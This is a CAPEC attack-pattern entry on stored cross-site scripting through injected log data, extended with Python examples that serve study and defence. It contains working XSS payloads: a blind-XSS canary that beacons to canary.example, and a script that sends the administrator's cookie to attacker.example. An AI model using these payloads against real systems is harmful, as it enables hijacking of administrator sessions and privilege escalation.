Cross Site Scripting through Log Files
Attack Pattern ID: 106 (Standard Attack Pattern Completeness: Complete)
Typical Severity: High
Status: Draft
+ Description

Summary

An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin (web-based) administrative interface and the log data is not HTML encoded before being written to the page, the attacker's stored script executes in the administrative interface, in the administrator's browser and session, with potentially serious consequences. This attack pattern is a combination of two other attack patterns: log injection and stored cross site scripting.

Attack Execution Flow

Explore
  1. Probe for log injection vulnerability:

    The attacker tests all user-controllable data inputs to the system for log injection vulnerabilities. This may be difficult (unless the attacker has a white box view of the system) because there is often no feedback event indicating to the attacker that a given input is being logged.

    Outcomes

    ID  Type     Outcome Description
    1   Success  User-injected input shows up in the logs

    Security Controls

    ID  Type          Security Control Description
    1   Preventative  Apply appropriate input validation and filtering of user-controllable input before writing to logs
  2. Probe for cross-site scripting vulnerability:

    The attacker tests all user-controllable data inputs to the system for cross-site scripting vulnerabilities. Cross-site scripting vulnerabilities identified anywhere in the application indicate an increased potential that such vulnerabilities also exist in the log management portions of the application.

    Outcomes

    ID  Type     Outcome Description
    1   Success  Attacker-injected script is executed in the user's browser.

    Security Controls

    ID  Type          Security Control Description
    1   Preventative  HTML encode all log contents before displaying them in log management interfaces.
Experiment
  1. Confirm exploitability:

    Create a simple script and inject it into one of the potentially vulnerable fields. This script should take some action that gives the attacker an indication that the attack vector exists (for example, a request back to a host the attacker controls).

    Attack Step Techniques

    ID  Attack Step Technique Description                                                                                                                          Environments
    1   The idea is to receive some sort of feedback event that confirms the attack is succeeding. This is done with a simple script before crafting a possibly more complex script to launch the actual attack.   env-Web

    Outcomes

    ID  Type     Outcome Description
    1   Success  Expected script execution feedback event is observed.
Exploit
  1. Inject System Logs with Malicious Scripts:

    Create a malicious script to run in the administrator's web based interface and inject it in the system's logs through one of the user controlled fields that are being logged.

    Attack Step Techniques

    ID  Attack Step Technique Description                                                                                                                                                         Environments
    1   Inject the vulnerable fields by tampering with their values to contain the malicious scripts. Possibly trigger another event that makes it more likely that injected logs are viewed in the vulnerable UI as soon as possible.   env-Web
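The Explore and Experiment steps above hinge on one problem: the attacker normally gets no direct feedback that a field is logged, let alone rendered unencoded in an administrator's viewer. The usual answer is a per-field canary: each probe carries a unique token and an out-of-band callback, so when the administrator's browser later renders the log, the callback arrives and identifies which field and which probe reached the vulnerable viewer. The following is an added example, not part of the CAPEC entry; the listener host canary.example, the /p callback path, and the access-log lines are constructed for the illustration.

```python
"""Blind-XSS canary for the Explore/Experiment steps of CAPEC-106.

Added example (not CAPEC's own code). Assumptions: the tester controls a
listener at canary.example that records requests to /p in a common-log-
format access log; the token/field registry lives in memory.
"""
import secrets
from urllib.parse import parse_qs, urlsplit

CALLBACK_HOST = "https://canary.example"   # assumed listener the tester controls


def make_probe(field, registry, token=None):
    """Build the 'simple script' for one input field and record which field
    it was planted in. The payload does nothing but beacon its token and the
    URL of the page that rendered it; a fixed token is accepted for tests."""
    token = token or secrets.token_hex(8)
    registry[token] = field
    beacon = f"{CALLBACK_HOST}/p?t={token}"
    return ('<img src=x onerror="fetch(\'' + beacon
            + '&u=\'+encodeURIComponent(location.href))">')


def correlate(listener_lines, registry):
    """Match callback hits in the listener's access log back to the field
    that carried each token. Returns (field, page) pairs, where page is the
    URL of the viewer that rendered the probe, i.e. the vulnerable UI."""
    hits = []
    for line in listener_lines:
        for part in line.split():
            if not part.startswith("/p?"):
                continue
            q = parse_qs(urlsplit(part).query)
            token = q.get("t", [""])[0]
            if token in registry:
                hits.append((registry[token], q.get("u", [""])[0]))
    return hits


# Constructed listener log (not real traffic): one hit from a probe planted
# in the username field, one from an unknown token (scanner noise).
SAMPLE_LISTENER_LOG = [
    '203.0.113.5 - - [12/Jan/2009:10:00:01 +0000] '
    '"GET /p?t=0123456789abcdef&u=https%3A%2F%2Fadmin.example%2Flogs%2Fview HTTP/1.1" 200 -',
    '198.51.100.9 - - [12/Jan/2009:10:00:07 +0000] '
    '"GET /p?t=ffffffffffffffff&u=x HTTP/1.1" 200 -',
]


def demo():
    """Plant one probe in the username field and correlate the sample log."""
    registry = {}
    payload = make_probe("username", registry, token="0123456789abcdef")
    return payload, correlate(SAMPLE_LISTENER_LOG, registry)


if __name__ == "__main__":
    payload, hits = demo()
    print("probe planted in username field:", payload)
    for field, page in hits:
        print(f"feedback: field {field!r} was rendered unencoded at {page}")
```

The beacon reports the viewer's URL, which tells the tester not just that the field is logged but where the log is rendered; a hit from a page under /logs is the "feedback event" the Experiment step looks for, and only then is a heavier payload worth crafting.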
+ Attack Prerequisites

The system uses a web based interface

The system does not cleanse / validate user supplied data before writing it to logs

Information from logs is displayed in a web based interface

The web based log interface does not HTML output encode the log data prior to displaying it in the administrator console.

+ Typical Likelihood of Exploit

Likelihood: Medium

+ Methods of Attack
  • Injection
+ Examples-Instances

Description

An attacker determines that a particular system uses a web based interface for administration. The attacker creates a new user record and supplies a malicious script in the user name field; the script is designed to steal the administrator's authentication cookie and forward it to a site controlled by the attacker. The user name field is not validated by the system and is logged as is. At some point later, an administrator reviews the log activity in the administrative console. When the administrator comes across the attacker's activity record, the malicious script is executed in the context of the administrator's browser, stealing the administrator's authentication cookie and forwarding it to the attacker. The attacker then uses the received authentication cookie to log in to the system as an administrator, assuming that the administrator console can be accessed remotely.

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

Requires the ability to write a simple script and try to inject it through various user controlled fields in the system.

+ Resources Required

No specialized hardware is required

+ Probing Techniques

Locate system screens for operations that are likely to be logged and use these as starting points for injection

+ Solutions and Mitigations

Cleanse all user supplied data before placing it in the logs. Reject all bad data. Ensure that the data is in the expected form, and neutralize line breaks and other control characters so a single field cannot forge additional log lines.

Use proper HTML output encoding on the log data before displaying it in the administrative console, so that characters such as '<', '>', '&' and quotes are rendered as text rather than interpreted as markup. Encoding, unlike stripping, preserves the attacker's input so the administrator can still see exactly what was submitted.

If possible, disable script execution in the administrative interface.
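The description, the example instance and the three mitigations above fit into a few dozen lines. The following is an added example, not code from the CAPEC entry: a log writer and a server-side log viewer, each in a vulnerable form next to its hardened form, fed the cookie-stealing username from the example. The log format, the username rule, the host attacker.example and the Content-Security-Policy value are assumptions made for the illustration.

```python
"""CAPEC-106 end to end: log injection feeding stored XSS in a log viewer.

Added example (not CAPEC's own code). Assumptions: the application logs the
user-supplied username of each login attempt as "LOGIN username=...", and an
administrator views the log through a server-rendered HTML page.
"""
import html
import re

# Constructed sample input (not from the CAPEC entry): the username from the
# page's example, carrying a script that ships the admin's cookie to an
# attacker-controlled host (attacker.example is a placeholder).
MALICIOUS_USERNAME = (
    'bob<script>new Image().src="https://attacker.example/c?"'
    '+encodeURIComponent(document.cookie)</script>'
)

LOG = []  # stand-in for the application's log file

_USERNAME_OK = re.compile(r"[A-Za-z0-9_.@-]{1,64}")   # assumed expected form
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def log_login_unsafe(username):
    """Vulnerable writer (CWE-117): the user-supplied field is logged verbatim,
    so whatever the attacker typed, script tags included, waits in the log
    for the administrator to view later."""
    line = f"LOGIN username={username}"
    LOG.append(line)
    return line


def log_login_safe(username):
    """Hardened writer: validate against the expected form and reject the
    rest. The rejected value is still recorded for investigators, but with
    CR, LF and other control characters neutralized so one field cannot
    forge additional log lines (the log-injection half of the pattern)."""
    if _USERNAME_OK.fullmatch(username):
        line = f"LOGIN username={username}"
    else:
        neutral = _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), username)
        line = f'LOGIN username=<rejected> raw="{neutral}"'
    LOG.append(line)
    return line


def render_log_unsafe(lines):
    """Vulnerable viewer (CWE-79): log text is concatenated straight into the
    admin page, so a stored <script> tag becomes live markup."""
    rows = "".join(f"<tr><td>{line}</td></tr>" for line in lines)
    return f"<table>{rows}</table>"


def render_log_safe(lines):
    """Hardened viewer: every log line is HTML-encoded on output. Nothing is
    stripped; '<' becomes '&lt;', so the browser shows the payload as text
    and the administrator can still read what was submitted."""
    rows = "".join(
        f"<tr><td>{html.escape(line, quote=True)}</td></tr>" for line in lines
    )
    return f"<table>{rows}</table>"


# Third mitigation on the page, expressed as response headers for the log
# page (assumes the viewer itself needs no JavaScript).
ADMIN_LOG_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'none'; object-src 'none'",
}


def has_live_script(page):
    """Check used below: does an unencoded <script> tag reach the markup?"""
    return "<script>" in page


if __name__ == "__main__":
    stored = log_login_unsafe(MALICIOUS_USERNAME)
    print("vulnerable viewer executes it:", has_live_script(render_log_unsafe([stored])))
    print("encoded viewer shows it as text:", not has_live_script(render_log_safe([stored])))
    print(log_login_safe("alice"))
    print(log_login_safe("eve\r\nLOGIN username=admin"))
```

The two controls are independent: even when the writer rejects bad usernames, the raw value it records still contains '<', so the viewer must encode regardless, and a viewer that encodes still benefits from a writer that cannot be made to forge lines. The CSP header is the backstop for the day an encoding call is forgotten.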

+ Attack Motivation-Consequences
  • Information Leakage
  • Privilege Escalation
  • Run Arbitrary Code
  • Data Modification
+ Related Weaknesses
CWE-ID  Weakness Name                                                     Weakness Relationship Type
79      Failure to Preserve Web Page Structure ('Cross-site Scripting')   Targeted
117     Improper Output Sanitization for Logs                             Targeted
74      Failure to Sanitize Data into a Different Plane ('Injection')     Secondary
20      Improper Input Validation                                         Secondary
+ Related Attack Patterns
Nature   Type            ID  Name
ChildOf  Attack Pattern  18  Embedding Scripts in Nonscript Elements
    View(s) this relationship pertains to: Mechanism of Attack (primary), 1000
ChildOf  Attack Pattern  63  Simple Script Injection
    Script injection attack pattern is one of the components of the current attack pattern
    View(s) this relationship pertains to: Mechanism of Attack, 1000
ChildOf  Attack Pattern  93  Log Injection-Tampering-Forging
    Log injection attack pattern is one of the components of the current attack pattern
    View(s) this relationship pertains to: Mechanism of Attack, 1000
+ Relevant Security Requirements

HTML output encode all data prior to writing to an HTML page

Properly validate and cleanse/reject user supplied data before writing it to log files

+ Related Security Principles
  • Reluctance to Trust
  • Defense in Depth

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: Medium
+ Technical Context
Architectural Paradigms
Client-Server
n-Tier
SOA
Frameworks
All
Platforms
All
Languages
All
+ Content History
Submissions
Submitter          Organization           Date        Comments
Evgeny Lebanidze   Cigital, Inc           2009-01-12  Initial core pattern content
Modifications
Modifier           Organization           Date        Comments
Sean Barnum        Cigital Federal, Inc.  2009-04-20  Refinement of pattern content